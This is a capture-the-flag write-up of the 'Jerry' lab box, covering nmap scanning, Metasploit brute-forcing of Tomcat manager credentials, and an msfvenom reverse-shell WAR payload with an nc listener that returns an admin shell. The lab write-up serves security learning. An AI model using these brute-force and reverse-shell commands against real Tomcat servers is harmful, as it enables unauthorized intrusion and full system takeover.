This was the first box I did
Phase 1: Recon
- IP Address :10.10.10.95
- Host Name : Jerry
Phase 2: Scanning
Nmap scan report for 10.10.10.95
Host is up (0.073s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2008|7|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 7 Professional (85%), Microsoft Windows Vista SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hopsTRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 72.49 ms 10.10.14.1
2 72.56 ms 10.10.10.95OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.39 seconds
Findings:
- OS: Microsoft Windows Server 2012
- Open Ports: 8080 Apache Tomcat
Phase 3:Exploitation / Gaining Access
Clicking on Manger App gives us a a login box , now we could Google and search for Apache 7.0 credentials , but there a Metasploit module to brute force them use auxiliary/scanner/http/tomcat_mgr_login
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf > ... set rhosts 10.10.10.95
msf > ... run
Using these default credentials allow us to log in the Web Application Manger where we up can upload and deploy Java War files
Using msfvemon we create a WAR file with a reverse shell payload , upload it. There a good msfvemeon cheat sheet over at https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=444 -f war > shell.warLHOST : attacker machine IP Address
LPORT : the port to listen on the attacker machine , I’m using 444 but you can use any just make sure it is not a common port number
Once the WAR file is created we need create a listener with netcat , open a new terminal window an type
nc -nlvp 444
- n : Don’t perform DNS lookups on names of machines on the other side
- l: listen mode
- v: printing out messages on Standard Error, such as when a connection occurs
- p: local port to listen
(side-note in the OSCP you not allow to to use Metasploit but you can use msfvenom to create a payload)
In the Tomcat Web Application Manger click on browse, select your WAR file , then click on Deploy
Click on the uploaded file or open browser an go to http://10.10.10.95:8080/<warname>
You should get a shell back with admin privileges.
Phase 4: Maintaining Access
Locating the flags
This shell act just like an normal windows command prompt of just cd in to the Administrator folder
cd C:\Users\Administrator\Phase 5: Covering tracks
Just type exit to exit the session
